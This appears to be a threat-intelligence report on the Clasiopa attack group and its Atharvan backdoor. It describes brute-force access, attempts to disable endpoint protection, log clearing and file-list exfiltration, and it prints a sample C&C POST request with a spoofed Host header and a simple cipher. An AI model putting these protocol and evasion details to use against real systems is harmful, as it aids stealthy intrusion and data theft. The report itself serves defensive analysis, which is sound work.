A hitherto unknown attack group has been observed targeting a materials research organization in Asia. The group, which Symantec calls Clasiopa, is characterized by a distinct toolset, which includes one piece of custom malware (Backdoor.Atharvan). At present, there is no firm evidence on where Clasiopa is based or whom it acts on behalf.
Clasiopa Tactics, Techniques, and Procedures
The infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.
Aside from the distinct toolset used, there were a number of attack hallmarks observed:
- The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip
- An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using “smc -stop”. Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.
- The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.
- Sysmon logs were cleared using wsmprovhost.
- All eventlogs were cleared using PowerShell.
- A scheduled task named “network service” was created to list file names.
There is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named “dgs” and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.
HCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.
Tools Used
- Atharvan: Custom developed remote access Trojan (RAT).
- Lilith: The attackers used modified versions of the publicly available Lilith RAT. The versions used were capable of carrying out the following tasks:
- Killing the process
- Restarting the process
- Modifying the sleep interval
- Uninstalling the RAT
- Executing a remote command or PowerShell script
- Exiting the process
- Thumbsender: Hacking tool which, when it receives a command from a command-and-control (C&C) server will list file names on the computer and save them in a file called Thumb.db before sending them to a specified IP address.
- Custom proxy tool.
Atharvan
Atharvan is so-named because when the malware is run, it creates a mutex named: “SAPTARISHI-ATHARVAN-101” to ensure that only one copy is running.
It will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.
The C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as “update.microsoft.com”, e.g.:
POST /update.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52
Host: update.microsoft.com
Content-type: application/x-www-form-urlencoded
Content-length: 46
id=Atharvan&code=101&cid=H^[REDACTED]&time=5
The request body includes the following parameters:
- “id”: hardcoded string “Atharvan”
- “code”: represents request purpose, which can be one of:
- 101: fetches commands
- 102: sends command outputs or error messages
- 103: fetches file body to write when processing command 0x12
- “cid”: hardcoded string “H^” followed by the network interface hardware address of the affected computer as 12 hexadecimal digits
- “time”: interval between communication attempts
- “msg” (optional): depending on the request purpose as specified using “code” parameter:
- when the “code” parameter is 102, it includes output of commands or error messages in encrypted form
- when the “code” parameter is 103, it identifies the file to fetch in non-encrypted form
When encrypting the “msg” value, the malware uses the following encryption algorithm:
def encrypt(plaintext):
return bytes([((2 – byte) & 0xff) for byte in plaintext])
The malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:
def decrypt(ciphertext):
return bytes([((2 – byte) & 0xff) for byte in ciphertext])
When fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the “x1A” character.
The first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research